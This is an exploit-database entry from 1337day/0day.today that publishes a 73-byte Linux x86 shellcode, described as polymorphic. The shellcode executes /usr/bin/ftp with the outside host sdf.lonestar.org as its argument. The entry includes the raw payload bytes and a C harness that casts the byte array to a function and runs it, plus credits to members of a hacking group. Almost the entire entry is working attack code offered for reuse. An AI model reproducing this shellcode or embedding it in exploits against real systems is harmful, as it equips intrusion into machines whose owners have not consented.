linux/x86 execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) 73 bytes

2011-10-24T00:00:00
ID 1337DAY-ID-17197
Type zdt
Reporter 0x1337day
Modified 2011-10-24T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            /* 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL)
 * polymorphic shellcode
 * Tested On : Debian Squeeze 6.02 (Linux x86-based OS)
 * Programmer : Paulus Gandung Prakosa_ (0x1337day)
 * Thanks to : mywisdom, chaer.newbie, wenkhairu, ketek, gunslinger_,
 *             nofia_fitri, xtr0nic, t3k0, tabun, petimati, and all
 *             devilzc0de member
 */

#include <stdio.h>
#include <string.h>

char sdf_ftp[] = "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2e"
                 "\x6f\x72\x67\x68\x73\x74\x61\x72\x68\x6c"
                 "\x6f\x6e\x65\x68\x73\x64\x66\x2e\x89\xe6"
                 "\x83\xec\x01\x88\x04\x24\x68\x2f\x66\x74"
                 "\x70\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73"
                 "\x72\x50\x56\x83\xee\x0d\x56\xb0\x0b\x89"
                 "\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31"
                 "\xdb\xcd\x80";

int main(void)
{
	int ftp_len = strlen(sdf_ftp);
	fprintf(stdout, "[+] Length of the shellcode is : %d bytes\n", ftp_len);
	((void(*)(void))sdf_ftp)();

	return 0;
}




#  0day.today [2016-04-19]  #